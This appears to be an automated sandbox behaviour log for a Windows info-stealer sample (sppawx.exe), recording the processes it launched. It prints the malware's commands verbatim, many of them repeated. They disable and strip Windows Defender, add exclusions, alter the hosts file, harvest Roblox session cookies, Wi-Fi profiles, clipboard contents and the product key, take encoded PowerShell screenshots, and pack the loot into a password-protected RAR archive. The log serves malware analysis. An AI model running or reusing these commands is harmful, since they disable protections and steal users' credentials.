              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAA